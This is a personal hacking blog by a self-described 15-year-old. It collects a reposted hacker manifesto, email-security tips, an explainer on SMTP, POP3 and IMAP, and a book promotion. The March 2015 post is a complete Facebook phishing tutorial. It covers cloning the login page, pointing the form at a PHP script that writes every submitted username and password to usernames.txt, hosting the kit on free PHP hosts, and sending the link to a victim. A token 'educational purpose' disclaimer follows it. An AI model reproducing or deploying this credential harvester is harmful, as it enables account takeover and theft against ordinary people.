Sunday 14 August 2016

Aman Kumar Hacker







My Name is Aman Kumar & I'm 15 years old I'm interested in cyber security and finding bugs in virtual world.  I'm the founder & Editor of this website.Here you will know some cool tricks and tip about your Pc & you will learn Hacking from beginning(for educational prupose only).THANK YOU VERY MUCH FOR VISITING MY WEBSITE

This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals. Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.


Thursday 12 March 2015

Phissing-hack facebook account with phissing

  1. Phishing is the attempt to acquire sensitive information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication.
  2. How to create phissing page-

  3. 1.Go to the Facebook  ,and then right click on the page, u will see the option "view source" page,click on that.




                                              
    2.Now a new tab will open which contain a source code,Select all the codes and paste it in a notepad.
    3.Now open notepad and find action
    4.You will have to find a text which looks like 

                                           action="https://www.facebook.com/login.php?login_attempt=1"

    5.delete all the text written after action= and instead of it write post.php
                                                     EXAMPLE-"action="post.php"

    6.Now save it on your desktop with the name index.htm,not index.html,remember.


    7.Now your phishing page is ready


                                                       
    8.Now u need php code (it is main part )Open a new notepad and save the given data with the name post.php.

    <?php
    header ('Location:http://www.facebook.com/');
    $handle = fopen("usernames.txt", "a");
    foreach($_POST as $variable => $value) {
       fwrite($handle, $variable);
       fwrite($handle, "=");
       fwrite($handle, $value);
       fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?> 

    9.You have two files now one is index.htm and another is post.php,remember file extension is important.

    10.Now u have to upload it in any  a web hosting site which supports php script,i prefer u to use www.000webhost.com or www.,my3gb.com.

    11.Here i'm using 000webhost because i have an alredy account in it
                               
    hosting website
                                                  

    12.You have to make a account in that ,after that it looks like a picture given below.


                                                                              
    13.Now go control pannel,then on file manager.

    14.After that a new window will pop up.Now go to public_html.


                                               
                                            

    15.Delete the file named default.php,after that upload two files index.htm and post.php one by        one .



                                            
    16.Now the last step click on view of index.htm it will look same as facebook page.


                                             

    17.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.

    18.Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.
                                    


                                            

    19.Click on view now u will have your friend's password and email id.


                                               

    20.This is a simple trick to hack any Facebook password account by phishing page.

    21.If you are not able to create a phishing page then i will provide u a video tutorial link,look
          in to the description of that video u will find a prepared module of phishing pages,download  
          it and enjoy. 

    1. YOU CAN DOWNLOAD FACEBOOK PHISSING FILE NO NEED TO DO ANYTHING JUS DOWNLOAD AND UPLOAD FILE TO 00webhost OR any other webhosting site.


    note: Phissing is illegal activity.Don't

  4. try to anyone.Don't use ur Hacking 

  5. telent to harm any one.

  6. This tutorial is for educational propose

  7.             +Aman Kumar 

Monday 2 March 2015

how to secure your e-mail account

It’s tough to get people to pay attention and be serious about their online identity. An Email account is the first and primary component of your online identity and yet it’s the one that is left unguarded the most. Email accounts may be virtual but once hacked, the consequences and damages are very real.
The problem with a hacked email account is the domino effect. All registrations, purchases, renewals, transactions, password reminders etc. are sent to your email inbox. So once the first domino falls, the entire setup falls apart in one fell swoop. After the jump, we’ve rounded up a few tips that can help you secure your email accounts of popular webmail services.

Use a Strong Password


Strong Password
Yes, I know this is what every other tech blogger says every single time. But that has never made people any wiser. Even hackers feel insulted when they come across passwords like “sweetlove123”, “pass@123” and the like. Google is the best when it comes to putting real effort into securing your email account proactively. You can use special characters, numbers, upper and lower case alphabets of almost any length. My Gmail password is between 60 to 80 characters long and my general rule of thumb is to have a password that only the NSA can hack.

Use a reliable Secondary Email Address

Absolutely no Hotmail accounts for secondary fallback email account people. They still have their stone age era email account expiry plan after certain number days of non usage. So if the secondary email address is Hotmail and is expired, anyone create it back again to receive password reset information. And since webmail providers have this peculiar habit of giving all kinds of hints to remind you of the email address where the password recovery link has been sent, use an uncommon, custom domain or corporate email address that is hard to guess and hack into.

Setup SMS Alerts


SMS Alerts
Go to your account settings and add your mobile number to receive SMS alerts. Once that’s set up, Google will send you the password reset code whenever somebody tries to reset your password. Alternatively, if you are a smartphone user, you can rely on these SMS alerts and disable password recovery via email altogether. Email accounts are always vulnerable to a hacker from a remote place but your mobile phone is not. Yahoo provides the same feature free too. Hotmail has a similar feature but is not supported in a lot of countries.

Be sensible with your security question

Ok. There’s absolutely no point in having the security question, “My favorite doggy”, and posting pics of you and your poodle with images titled “Rolling with Rosy” on Facebook and Twitter. A lot of personal information is available online, thanks to social networks. On being the weakest links in the email security chain, security questions rank ahead of weak passwords. It’s nice to be an open book but select a question from those stapled pages and blacked out lines.

Check Filters and Forwarding Addresses

In the event of a hack and after reclaiming the account, go through the existing filters to check if there are some sneaky filters set up that forward all your credit card, login info, bank account and other sensitive correspondence to an email address that is not yours. Go to the forwarding page and see that all your incoming mails are not forwarded to the hacker either. This helps you avoid getting hacked in the future too.

Avoid Public WiFi

Happy to have discovered an unsecured WiFi hotspot? Or mooching your neighbour’s spilt WiFi? Enjoying the free WiFi of the coffee shop round the corner? Good for you and so is for the hacker sitting nearby to sniff the packets right out of thin air. Avoid using public WiFi for accessing email or transacting online with a credit card. Casual browsing and YouTube watching (without logging in) are Ok. Accessing emails is a big no, no.

Do not share your login information

Another obvious fact. But at times, it’s necessary for small businesses and online entrepreneurs to share login information with colleagues. For example, accessing Google AdSense, Analytics or Microsoft Live services etc. The ideal solution is to create a dedicated account for accessing these services instead of linking everything to your personal email id and sharing it.

Login regularly

Even if a hacker gets hold of the answer to your security question, they cannot use it immediately to reset the password and break into your Gmail account. Password reset with security question is possible only after 24 hours of your account being inactive after receiving the password reset instructions. So for once, checking your mail regularly is a good thing. Also, it will help reset the Hotmail account’s expiry date. Unfortunately Hotmail and Yahoo do not have this useful restriction in place.

Special Features

Gmail

Enable HTTPS by default from your account settings. This helps from the password getting sniffed when transmitted over public WiFi hot spots. If you are a Google Apps user, enable pre release features to avail the upcoming two factor authentication system before it launches.

Hotmail

Use the Windows Live Essentials package and verify the computer you are using as reliable. “Trusted PC” is a unique new proof that lets you link your Hotmail account with one or more of your personal computers. Then, if you ever need to regain control of your account by resetting your password, you simply have to use the trusted computer and Hotmail will know you are the legitimate owner. It’s a great feature for those who are really paranoid about email security.

Yahoo


Sign In Seal
Make use of the sign in seal option to verify the computer. Sign in seal is basically an image or color that Yahoo displays for each of your computers adding another layer of security to the login process.

Avoid Webmail

Still not sure about the safety and security of your email account online? It is totally understandable and I suggest you to take it off the Internet. I mean, partially. Get hold of an ISP and get a POP or IMAP account set up for your email address forgoing the webmail set up. Then use desktop email clients like Outlook or Thunderbird to pull your mails. It will make you feel dated, but is reliable and works effectively too.
Did we miss an important tip or got a better suggestion? Share it with the rest of community in the comments section.

Friday 30 January 2015

how e-mail works

Email is based around the use of electronic mailboxes. When an email is sent, the message is routed from server to server, all the way to the recipient's email server. More precisely, the message is sent to the mail server tasked with transporting emails (called the MTA, for Mail Transport Agent) to the recipient's MTA. On the Internet, MTAs communicate with one another using the protocolSMTP, and so are logically called SMTP servers (or sometimes outgoing mail servers).
The recipient's MTA then delivers the email to the incoming mail server (called the MDA, for Mail Delivery Agent), which stores the email as it waits for the user to accept it. There are two main protocols used for retrieving email on an MDA:
  • POP3 (Post Office Protocol), the older of the two, which is used for retrieving email and, in certain cases, leaving a copy of it on the server.
  • IMAP (Internet Message Access Protocol), which is used for coordinating the status of emails (read, deleted, moved) across multiple email clients. With IMAP, a copy of every message is saved on the server, so that this synchronization task can be completed.
For this reason, incoming mail servers are called POP servers or IMAP servers, depending on which protocol is used.
To use a real-world analogy, MTAs act as the post office (the sorting area and mail carrier, which handle message transportation), while MDAs act as mailboxes, which store messages (as much as their volume will allow) until the recipients check the box. This means that it is not necessary for recipients to be connected in order for them to be sent email.
To keep everyone from checking other users' emails, MDA is protected by a user name called a login and by a password.
Retrieving mail is done using a software program called an MUA (Mail User Agent).
When the MUA is a program installed on the user's system, it is called an email client (such as Mozilla Thunderbird, Microsoft Outlook, Eudora Mail, Incredimail or Lotus Notes).
When it is a web interface used for interacting with the incoming mail server, it is called webmail.

Open relay

By default, and for historical reasons, it is not necessary to authenticate oneself to send email, which means that it is very easy to falsify one's own address when sending mail.
For this reason, nearly all Internet service providers lock down their SMTP servers to that only their subscribers can use them, or more precisely only machines whose IP address belongs to the ISP's domain. This explains why travelling users must modify the outgoing server settings in their email clients each time they move to a new home or business.
When an organization's email server is improperly configured and allows third-party users on any network to send emails, this is called an open relay.
Open relays are generally used by spammers, as using them hides the true origins of their messages. As a result, many ISPs keep an up-to-date blacklist of open relays, to keep subscribers from receiving messages from such servers. By +Aman Kumar 

Sunday 4 January 2015

Learn Hacking From Beginning

Most of us are very curious to learn Hacking and want to become a Hacker, but don’t know where to start. If you are in a similar situation, then this article will most likely guide you to reach your goal.
On a regular basis, I get a lot of emails where people ask me “How to Become a Hacker”. In fact, this question is not an easy one to answer, since hacking is not an art that can be mastered overnight. It requires knowledge, skills, creativity, dedication and of course the TIME. Everyone can become a hacker provided they learn it from the basics. So, if you wanna become a hacker, then all you need is a good source of knowledge that will guide you through various concepts of hacking from the basics.

What Skills do I Need to Become a Hacker?

In simple words, there is no magic to become a  Hacker. But, like anything else that is worthwhile, it takes dedication and willingness to learn. It is most important to have a basic knowledge of the topics such as operating system basics and it’s working, computer networks, computer security and of course programming. However, you need not be the expert in each or any of those topics mentioned. As you gain the basic knowledge of various branches of computer, you can choose any one as your favorite and advance in it.

What is the Best Way to Become a Hacker?

As said earlier, the best way to become a hacker is to start from the basics. You will have to master the basics to build a strong foundation. And once this is done, you’ll be in a position to explore new ideas and start thinking like a Hacker.
There exists tons of books on the market that will teach you hacking, but unfortunately, it requires a set of pre-established skills and knowledge to understand the concepts explained in those books. Also, most of them are not suitable for the beginners who doesn’t know anything about hacking.
Anyhow, I have found an excellent Book for the Beginners that will teach you hacking from the basics. This book is the first step to fulfil your dream of becoming a hacker. When I first read this book, I myself was surprised at how simple and easy it was laid out. I decided to introduce this book for all those enthusiasts as it can be the right source for the beginners who are interested tolearn hacking from the basics. The good thing about this book is that, any one can understand the concepts presented here, without the need for any prior knowledge. This book is called:

Learn Hacking
This book will take you from the core to the top. It will tell you how to hack in simple steps. Everything in this book is presented in a simple and effective manner. It is a great source for the beginner who would like to become a hacker. This will install a Hacker’s Mindset on you.
The following skills are uncovered in this book:
You will learn all the hacker underground tricks and learn to apply them in real world situations.
  1. You will be put into a hacker mindset so that you will learn to think like a Hacker.
  2. By learning how a hacker thinks and acts, you will be able to protect yourself from future hack attacks.
  3. You will acquire knowledge nonexistent to 99.9% of the people in the world!
  4. This underground handbook may get you interested in pursuing a career as an Ethical Hacker.
  5. This book is of great value for all those who have a dream to become a Hacker. By +Aman Kumar